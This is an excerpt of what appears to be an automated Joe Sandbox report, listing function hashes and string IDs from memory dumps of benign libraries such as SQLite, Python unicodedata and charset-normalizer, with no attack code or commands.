                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2819143443-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1808094ad2c5952838fb359644ebaa2aa6756bbb3d9bb10f20ec9669fa938947
                                                                                                                                                                                                                                                                                                  • Instruction ID: bcb9bee5e22e4734cac954f9a18df6e71b624bba0ae85a4471af3080a6444076
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1808094ad2c5952838fb359644ebaa2aa6756bbb3d9bb10f20ec9669fa938947
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21F8B290A64281EB564F79DD58378B6B0EF44F69F14A238CD3A432E5CE3DE4858310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-1033472603
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a5822ed66852f877d5263b0bfad4721e3ac3b27357557e4696c0d3347838ad2
                                                                                                                                                                                                                                                                                                  • Instruction ID: faabe3cdf62e8397246480e0571d69386f056cf6ca37a8b2a7ad5e1b9d097116
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a5822ed66852f877d5263b0bfad4721e3ac3b27357557e4696c0d3347838ad2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1E188A1A0AB42C1EA669B39E89427D33A8EF46F84F0451B5CE4D0B795CF3CE4468724
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                                                                  • String ID: a unicode character$argument$category
                                                                                                                                                                                                                                                                                                  • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                                                                                                  • Opcode ID: 85221ed5b794fefa614671eb505fc7944d537497b256900e3b823b4235f4782d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7845104e7a5ff6976ca2bc798c7d5fc62ee17f549dd39453f3a3455858f5ad34
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85221ed5b794fefa614671eb505fc7944d537497b256900e3b823b4235f4782d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6851BBE6F1A686C1EB568B29D4502B863A9EB84F84F481075FE4F47790DF3CE856C360
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                                                                                                  • String ID: ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 2538524772-4234197119
                                                                                                                                                                                                                                                                                                  • Opcode ID: b6db84d1c7e11e830000ef7b1fab697241f009562e2efea8cddf9bf8aca289d7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4facc7cbdd0f7017ccb75d88b372fddd5aa7dd344a5a51ef896d0333b3626f50
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6db84d1c7e11e830000ef7b1fab697241f009562e2efea8cddf9bf8aca289d7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4441B6B294A60245EA629B7DDC54278F3B0BF49B94F14A234DE6C177B4DF3DE4418340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                                                                  • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                                                                                  • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5ca945e71462204c3220177ec9e6a27065e7f9c311bd085c84fc819a6770995f
                                                                                                                                                                                                                                                                                                  • Instruction ID: f2c55f16237191c60079ff4be3e138b02b7f2085208282a3113ef110d03bd668
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca945e71462204c3220177ec9e6a27065e7f9c311bd085c84fc819a6770995f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B41C5E2B1E682C2EF568B29D4543B92369EB44F90F445075EE5F87684CF3DE8928320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                                                                                                  • String ID: ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 2538524772-4234197119
                                                                                                                                                                                                                                                                                                  • Opcode ID: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b595f5a33f908d6afb0da204b50edef24cbdbd5f3d1fb6feb47f764f3cc404b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E419CA2D4B60281EA265B3DDC142B8E3B0AF5DB90F08B238DE6D526B5DF3DE4408741
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_symbol_count' cannot be deleted$attribute '_symbol_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2291034628
                                                                                                                                                                                                                                                                                                  • Opcode ID: 005893139290546e466727384096f8c4c27f16b4c59161034916739a6ab1bdf9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 05ac86adab0b38dc18e483f18d966f442d193f13fb23e606437603b0d3a997bd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 005893139290546e466727384096f8c4c27f16b4c59161034916739a6ab1bdf9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B31AFF1B4A50281EE56DB3DECA43B8A3B0BF44B94F58A135DE6E067B5DE2CD4848700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A85C8
                                                                                                                                                                                                                                                                                                  • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted, xrefs: 00007FFBAB6A863C
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A86C6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted$attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-528010561
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ca47d72e77a7153c4af469a22f98ddc2045af71414dbb353d6064c52d0c80cb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9ad931f2067ae44ed1ef2dae8f27b8a57e0e087311ba094e40dfe70de11b2d9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ca47d72e77a7153c4af469a22f98ddc2045af71414dbb353d6064c52d0c80cb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF3194B1B4A50281EE569B7DEC642B9A3B0BF44B94F58B135EE2D067F5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'UnprintablePlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'UnprintablePlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2596148235
                                                                                                                                                                                                                                                                                                  • Opcode ID: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
                                                                                                                                                                                                                                                                                                  • Instruction ID: c9ba952a5385258769016842feea9f0f3e1541150c610b1e16d29946fe9ef714
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 363183F1B4A50281EE56EB7DEC643B8B3B0AF44B94F58A135DE6E467B5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'CjkInvalidStopPlugin' object attribute '_cjk_character_count' cannot be deleted$attribute '_cjk_character_count' of 'CjkInvalidStopPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-399339277
                                                                                                                                                                                                                                                                                                  • Opcode ID: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ef31dc4fcbc792123d19176eb02f3bf37f84def70b5ef16646cad8821affdd7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 083194B1B4B50281EE569B7DEC642F9A3B0BF44B94F58A135DE6E067F5DE2CE4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManyAccentuatedPlugin' object attribute '_accentuated_count' cannot be deleted$attribute '_accentuated_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-3693778415
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
                                                                                                                                                                                                                                                                                                  • Instruction ID: b3e407f0d9e9706921d3cbe4c34b1a56a1c08a2b47f21cba2101b611bd50bbc3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1316FF1A4A54281EE56DB7DECA43B8A3B0BF44B90F58A135DE6D066B5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FFBAB6A84FC
                                                                                                                                                                                                                                                                                                  • int, xrefs: 00007FFBAB6A8586
                                                                                                                                                                                                                                                                                                  • attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB6A8488
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-634379450
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9f34a10082e7408a06585a838115ac7101f9d113935c9e3f38839a5990acb25f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA3185B1B4A50281EE569B7DEC642B8A370FF44B90F5CA135DE3D067B5DE2CD4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_buffer_accent_count' cannot be deleted$attribute '_buffer_accent_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-76466605
                                                                                                                                                                                                                                                                                                  • Opcode ID: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00fe87da7705dc53ab85f12caa4f35e694a9230059030670429dc57cc4f5b41a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 173190B1B4A50281EE469B7DECA42F9A3B0AF44B90F58A135DE3D067F5DE2CE4848300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_character_count' cannot be deleted$attribute '_bad_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2709777744
                                                                                                                                                                                                                                                                                                  • Opcode ID: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
                                                                                                                                                                                                                                                                                                  • Instruction ID: ee6136d73b1f49120c96c98de51e16b51bc59d8d9c049847599c35ec3b1d1aa7
